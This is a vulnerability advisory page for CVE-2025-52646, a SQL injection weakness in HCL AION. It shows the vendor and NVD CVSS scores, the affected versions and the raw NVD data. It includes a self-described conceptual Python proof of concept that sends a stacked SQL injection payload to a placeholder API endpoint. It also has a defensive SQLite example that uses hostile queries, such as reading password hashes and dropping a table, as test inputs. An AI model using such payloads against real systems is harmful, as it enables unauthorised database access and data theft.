Security Vulnerability Report
CVE-2025-52646 CVSS 2.2 LOW (vendor score; the NVD primary score in the raw data below is 5.3 MEDIUM)

CVE-2025-52646

Published: 2026-03-16 15:16:19
Last Modified: 2026-04-28 21:42:14

Description

HCL AION is affected by a vulnerability in which certain offering configurations may permit the execution of potentially harmful SQL queries. Insufficient validation of, or restrictions on, query execution could expose the system to unintended database interactions or limited information disclosure under specific conditions.

Weakness: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command), per the weakness entry in the raw data below.

CVSS Details

CVSS Score
2.2
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
Source
Vendor (secondary) assessment: local access, high attack complexity, low privileges and user interaction required; low confidentiality impact only, no integrity or availability impact.

NVD (primary) assessment, from the raw data below
CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

The two assessments agree on impact (C:L/I:N/A:N) and disagree on every exploitability metric (attack vector, complexity, privileges, user interaction). When prioritising, treat the network-reachable, unauthenticated NVD vector as the worst case until the vendor advisory has been checked.

Configurations (Affected Products)

cpe:2.3:a:hcltech:aion:*:*:*:*:*:*:*:* - VULNERABLE
HCL AION from 2.0.0 up to, but not including, 2.1.2 (version range from the NVD configuration in the raw data below; confirm the exact affected and fixed builds against the vendor advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-52646 PoC - HCL AION SQL query execution
# Note: this is a conceptual PoC derived from the vulnerability description only.
# Nothing on this page names an endpoint, parameter or cookie: "/api/query",
# "config_id", "execute" and "JSESSIONID" below are placeholders that must be
# replaced with values observed in a real deployment.
# The vendor's CVSS vector (AV:L/UI:R) implies local access plus a user action;
# a bare remote POST as shown here corresponds to the NVD (AV:N/UI:N) reading.
import requests

# Configuration (placeholders)
target_url = "https://[AION_HOST]/api/query"
session_cookie = "[USER_SESSION_COOKIE]"

# Potentially harmful SQL: a stacked statement reading a table the
# offering configuration should not be able to expose
sql_payload = "'; SELECT * FROM users; --"

# Construct the request
headers = {
    "Cookie": f"JSESSIONID={session_cookie}",
    "Content-Type": "application/json",
    "X-Requested-With": "XMLHttpRequest",
}
payload = {
    "query": sql_payload,
    "config_id": "vulnerable_config",
    "execute": True,
}


def main():
    # Send the request (per the vendor vector, a user action is also required)
    try:
        response = requests.post(target_url, headers=headers, json=payload, timeout=30)
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")


if __name__ == "__main__":
    main()

# Recommended verification steps:
# 1. Check whether SQL query execution is restricted to administrators only
# 2. Verify input validation on all query parameters
# 3. Review the offering configuration settings for security controls
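
The description attributes the issue to insufficient validation of, or restrictions on, the SQL that an offering configuration is allowed to run, and the verification steps above ask whether execution is restricted and what controls the configuration exposes. The Python below is an added example, not HCL AION code and not taken from the advisory: it models a "configured report query" executed first on an unrestricted database handle (the vulnerable pattern) and then on a least-privilege handle that enforces a table allow-list, a function allow-list and read-only mode inside the engine. SQLite's authorizer hook stands in for whatever database AION actually uses; the schema, table names, rows and queries are constructed for the demonstration.

```python
import sqlite3

# Constructed sample schema and rows for the demonstration (not HCL AION's data model).
SEED_SQL = """
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password_hash TEXT);
CREATE TABLE offerings (id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO users VALUES (1, 'alice', 'h1'), (2, 'bob', 'h2');
INSERT INTO offerings VALUES (1, 'basic', 10.0), (2, 'premium', 25.0);
"""

# Tables an offering configuration may read; every other table is denied.
ALLOWED_TABLES = {"offerings"}
# SQL functions a configured query may call; anything else is denied.
ALLOWED_FUNCTIONS = {"count", "sum", "avg", "min", "max", "lower", "upper"}


def _seeded_connection():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SEED_SQL)
    return conn


def open_unrestricted():
    """Vulnerable pattern: the configured query runs with the application's full rights."""
    return _seeded_connection()


def _read_only_authorizer(action, arg1, arg2, db_name, trigger_or_view):
    """SQLite authorizer: permit SELECT over allow-listed tables and functions, deny the rest."""
    if action == sqlite3.SQLITE_SELECT:
        return sqlite3.SQLITE_OK
    if action == sqlite3.SQLITE_READ:          # arg1 = table name, arg2 = column name
        return sqlite3.SQLITE_OK if arg1 in ALLOWED_TABLES else sqlite3.SQLITE_DENY
    if action == sqlite3.SQLITE_FUNCTION:      # arg2 = function name
        return sqlite3.SQLITE_OK if (arg2 or "").lower() in ALLOWED_FUNCTIONS else sqlite3.SQLITE_DENY
    # INSERT, UPDATE, DELETE, DROP, CREATE, PRAGMA, ATTACH, ... all fall through to DENY.
    return sqlite3.SQLITE_DENY


def open_restricted():
    """Hardened pattern: same data, but configured queries run on a least-privilege handle."""
    conn = _seeded_connection()
    conn.execute("PRAGMA query_only = 1")          # engine-level write block (defence in depth)
    conn.set_authorizer(_read_only_authorizer)     # allow-list enforced when the statement is prepared
    return conn


def run_configured_query(conn, configured_sql):
    """Execute one statement taken from an offering configuration.

    Returns ("ok", rows) or ("denied", reason). Stacked statements are rejected
    before the engine sees them; a ';' inside a string literal is rejected too
    (fail closed rather than parse SQL by hand). The authorizer, not this
    string check, is the actual control.
    """
    body = configured_sql.strip().rstrip(";")
    if ";" in body:
        return ("denied", "stacked statements are not allowed")
    try:
        return ("ok", conn.execute(body).fetchall())
    except sqlite3.DatabaseError as exc:       # "not authorized" from the authorizer, and friends
        return ("denied", str(exc))


if __name__ == "__main__":
    report = "SELECT name FROM offerings ORDER BY id"
    hostile = "SELECT name, password_hash FROM users"
    for label, conn in (("unrestricted", open_unrestricted()), ("restricted", open_restricted())):
        print(label, "|", report, "->", run_configured_query(conn, report))
        print(label, "|", hostile, "->", run_configured_query(conn, hostile))
        print(label, "|", "DROP TABLE offerings", "->", run_configured_query(conn, "DROP TABLE offerings"))
```

On the unrestricted handle the hostile query returns password hashes and the DROP succeeds; on the restricted handle both fail at prepare time with "not authorized" while the legitimate report still works. On a production database the equivalent is a dedicated read-only role for configuration-driven queries plus an allow-list of statement types, which is the check the first verification step above is asking for.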

References

HCL Software support article KB0129410 (Vendor Advisory): https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52646", "sourceIdentifier": "[email protected]", "published": "2026-03-16T15:16:18.837", "lastModified": "2026-04-28T21:42:13.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where certain offering configurations may permit execution of potentially harmful SQL queries. Improper validation or restrictions on query execution could expose the system to unintended database interactions or limited information exposure under specific conditions."}, {"lang": "es", "value": "HCL AION está afectado por una vulnerabilidad donde ciertas configuraciones de la oferta pueden permitir la ejecución de consultas SQL potencialmente dañinas. La validación o las restricciones inadecuadas en la ejecución de consultas podrían exponer el sistema a interacciones no intencionadas con la base de datos o a una exposición limitada de información bajo condiciones específicas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.2, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": 
"Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aion:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.1.2", "matchCriteriaId": "1AD0DD06-7840-4FFE-8BCF-1B94410B237D"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}